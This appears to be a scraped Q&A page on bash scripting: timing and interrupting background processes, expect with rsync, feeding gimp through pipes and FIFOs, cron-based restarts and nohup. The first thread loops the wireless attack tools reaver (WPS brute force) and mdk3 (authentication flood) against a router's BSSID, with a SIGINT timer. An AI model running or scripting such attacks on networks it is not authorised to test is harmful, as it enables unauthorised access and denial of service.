send control c to a linux command after specific time intervel? - linux

Shell Scripting:
I am doing some testing on my router, I am using mdk3 and reaver utility for that.
here are the two commands:
[cmd1] echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv -l 230
[cmd2] sudo mdk3 wlan2mon a -a 00:FF:EE:CC:DS:B6
goal:
I am trying to create a shell script which will run [cmd1] for 2 minutes, then it will send the ctrl + c signal to [cmd1] so that it will save the reaver session.
then cmd2 will run for 2 minutes and this will also stop after that.
these two will be in loop.
below is the sample script which I written can you add timer to it..?
#!/bin/bash
while :; do echo
echo "running mdk for 2 minutes";
timeout 120 sudo mdk3 wlan2mon a -a 00:FF:EE:CC:DS:B6;
echo "mdk finished";
echo "starting reaver for 2 minutes ";
#here timeout won't work, as ctrl+c can only save the state.
//add code here to run reaver utility for two minutes and send ctrl+c to it
echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv;
echo "reaver ran for two minutes";
done

I'm not familiar with the reaver program, but I think the following should work,
# Run reaver as a background process (add &)
echo y|reaver -i wlan2mon -b 00:FF:EE:CC:DS:B6 -vv &
# Save the process id.
reaverpid=$!
# Sleep 2 minutes
sleep 120
# Send SIGINT, which is what ctrl-c normally does.
kill -SIGINT $reaverpid

Related

How to wait for first rsync process to complete before running next command in shell/bash script

Below is the script I have. Basically I just want to copy files from the other server by calling out this script. Some files are large and what happens is that it will kill the first rsync command before it completes and proceed with the next. I tried to use screen command but I'm not sure how to code Ctrl+a d (to detach) in shell/bash.
HFDIR=/var/opt/ubkp/data/local/prework/hotfixes
RODIR=/var/opt/ubkp/data/local/prework/rollouts
THFDIR=$(ls -t /var/opt/ubkp/data/local | grep hotfix | head -1)
TRODIR=$(ls -t /var/opt/ubkp/data/local | grep rollout | grep -v check | head -1)
user=$(/usr/seos/bin/sewhoami)
if [ $user = "root" ]; then
echo "This script should not be run as the TRUE root user"
echo "Log in so that \"sewhoami\" does not display \"root\" and then execute this script."
exit
else
#list of ROs and HFs
list=/tmp/list.txt
echo -n "Enter Password: "
read -s PWD
# first rsync command
/usr/bin/expect<<EOD
spawn rsync -a $user#server:$HFDIR/* /var/opt/ubkp/data/local/$THFDIR
expect "assword"
send "$PWD\r"
wait $!
expect eof
EOD
# second rsync command
/usr/bin/expect<<EOD
spawn rsync -a $user#server:$RODIR/* /var/opt/ubkp/data/local/$TRODIR
expect "assword"
send "$PWD\r"
expect eof
EOD
fi
exit
Your second rsync will be killed after 10 seconds as that is the default timeout for expect eof. You should add a wait after the send, to wait forever until the process ends.
Also, your should remove the $! in the wait. It is a shell variable, not an expect variable. Fortunately in this case $! is empty because you have not run any commands in the shell in the background with &.

Bash calls two bash scripts

I have the following script:
#!/bin/bash
if [ "$EUID" -ne 0 ]
then
echo ''
echo 'Please run the script as root'
echo ''
exit
fi
for run in {1..11}
do
sudo ./start_ap.sh
sleep 10
sudo ./tst.sh
done
The problem is that after executing
sudo ./start_ap.sh
the next lines will not be executed, because the line sudo ./start_ap.sh needs CTRL+C to stop and only then next lines will be executed.
However, I want that the sudo ./start_ap.sh will be terminated after sudo ./tst.sh and at next step this will be repeated 11 times.
So far, after execution of sudo ./start_ap.sh, the next lines will not be executed without killing its process.
How can I realize it?
P.S. start_ap.sh starts the hostapd and that's why it needs killing for next executions.
You need to run ./start_ap.sh in the background, then kill it after ./tst.sh completes. Note that if you actually run the script as root, there is no need to use sudo inside the script.
for run in {1..11}; do
./start_ap.sh & pid=$!
sleep 10
./tst.sh
kill "$pid"
done

Bash write to background job's stdin after its launch

This is quite naive but I'll give it a shot.
I would like to launch gimp from bash with gimp -i -b - & then read dbus signals in endless loop and post data obtained from these signals back to gimp I launched. The gimp -i -b - starts command line gimp and awaits for user input, like gnuplot etc. But is it possible to access its stdin from bash after command execution?
Ideally I would like something like that to work:
gimp -i -b - &
dbus-monitor --profile "..." --monitor |
while read -r line; do
gimp -b '(mycommand '$line')' &
done
gimp -b '(gimp-quit 0)' &
where all gimp cmd & are sent to same gimp instance.
Would be even better if I could close gimp instance if it's not used for long enough and start again when it's needed.
Is it possible with bash without writing some daemon app?
Simple Solution
You could us a simple pipe. Wrap the command sending part of your script into a function and call that function while piping its output to gimp:
#! /bin/bash
sendCommands() {
dbus-monitor --profile "..." --monitor |
while read -r line; do
echo "(mycommand $line)"
done
echo "(gimp-quit 0)"
}
sendCommands | gimp -i &
sendCommands and gimp -i will run in parallel. Each time sendCommands prints something, that something will land in gimp's stdin.
If that's your complete script, you can omit the & after gimp -i.
Killing and Restarting Gimp
Would be even better if I could close gimp instance if it's not used for long enough and start again when it's needed.
This gets a bit more complicated than just using the timeout command because we don't want to kill gimp while it is still processing some image. We also don't want to kill sendCommands between the consumption of an event and the sending of the corresponding command.
Maybe we could start a helper process to send a dbus-event every 60 seconds. Let said event be called tick. The ticks are also read by sendCommands. If there are two ticks without commands in between, gimp should be killed.
We use FIFOs (also called named pipes) to send commands to gimp. Each time a new gimp process starts, we also create a new FIFO. This ensures that commands targeted at the new gimp process are also sent to the new process. In case gimp cannot finish the pending operations in less than 60 seconds, there may be two gimp processes at the same time.
#! /bin/bash
generateTicks() {
while true; do
# send tick over dbus
sleep 60
done
}
generateTicks &
gimpIsRunning=false
wasActive=false
sleepPID=
fifo=
while read -r line; do
if eventIsTick; then # TODO replace "eventsIsTick" with actual code
if [[ "$wasActive" = false ]]; then
echo '(gimp-quit 0)' > "$fifo" # gracefully quit gimp
gimpIsRunning=false
[[ "$sleepPID" ]] && kill "$sleepPID" # close the FIFO
rm -f "$fifo"
fi
wasActive=false
else
if [[ "$gimpIsRunning" = false ]]; then
fifo="$(mktemp -u)"
mkfifo "$fifo"
sleep infinity > "$fifo" & # keep the FIFO open
sleepPID="$!"
gimp -i < "$fifo" &
gimpIsRunning=true
fi
echo "(mycommand $line)" > "$fifo"
wasActive=true
fi
done < <(dbus-monitor --profile "..." --monitor)
echo '(gimp-quit 0)' > "$fifo" # gracefully quit gimp
[[ "$sleepPID" ]] && kill "$sleepPID" # close the FIFO
rm -f "$fifo"
Note that the dbus-monitor ... | while ... done is now written as while ... done < <(dbus-monitor ...). Both versions do the same thing in terms of looping over the output of dbus, but the the version with the pipe | creates a subshell which doesn't allow to set global variables inside the loop. For a further explanations see SC2031.

Debian: Restart process when killed automatically in PuTTY

I would like to know if there is any simple script to automatically restart a screened background process.
The process gets killed but couldn't manage to create a successful one :(.
Thanks in advance! <3
I believe that the safest (but not the easiest) way to do this is to create a cron job to check if the process is running, and if it is not, restart it again. The reason why this method is "safer", is because if you use a loop like what ivanivan suggested and that script "crashes", the program will not be restarted again; on the other hand, by doing via cron, the check program will be called every minute.
For example, your cron could be:
* * * * * env DISPLAY=:0 /folder/testscript >/dev/null 2>&1
The env DISPLAY=:0 might not be needed in your case, or it might be needed, depending on your script (note: you might need to adapt this to your case, run echo $DISPLAY to find out your variable on the case).
For example, your testscript could be:
#!/bin/bash
testvar="$(ps aux | grep -s "mainscript" | grep -sv "grep -s mainscript")"
if [ -z "$testvar" ]; then nohup /folder/mainscript &; fi
#sleep and run second test
sleep 30
testvar="$(ps aux | grep -s "mainscript" | grep -sv "grep -s mainscript")"
if [ -z "$testvar" ]; then nohup /folder/mainscript &; fi
exit 0
On the example above, the testscript would check to see if the mainscript is running (and restart it if necessary) twice every minute.

why nohup does not launch my script?

Here is my script.sh
for ((i=1; i<=400000; i++))
do
echo "loop $i"
echo
numberps=`ps -ef | grep php | wc -l`;
echo $numberps
if [ $numberps -lt 110 ]
then
php5 script.php &
sleep 0.25
else
echo too much process
sleep 0.5
fi
done
When I launch it with:
./script.sh > /dev/null 2>/dev/null &
that works except when I logout from SSH and login again, I cannot stop the script with kill%1 and jobs -l is empty
When I try to launch it with
nohup ./script.sh &
It just ouputs
nohup: ignoring input and appending output to `nohup.out'
but no php5 are running: nohup has no effect at all
I have 2 aleternatives to solve my problem:
1) ./script.sh > /dev/null 2>/dev/null &
If I logout from SSH and login again, How can I delete this job ?
or
2) How to make nohup run correctly ?
Any idea ?
nohup is not supposed to allow you to use jobs -l or kill %1 to kill jobs after logging out and in again.
Instead, you can
Run the script in the foreground in a GNU Screen or tmux session, which lets you log out, log in, reattach and continue the same session.
killall script.sh to kill all running instances of script.sh running on the server.

Resources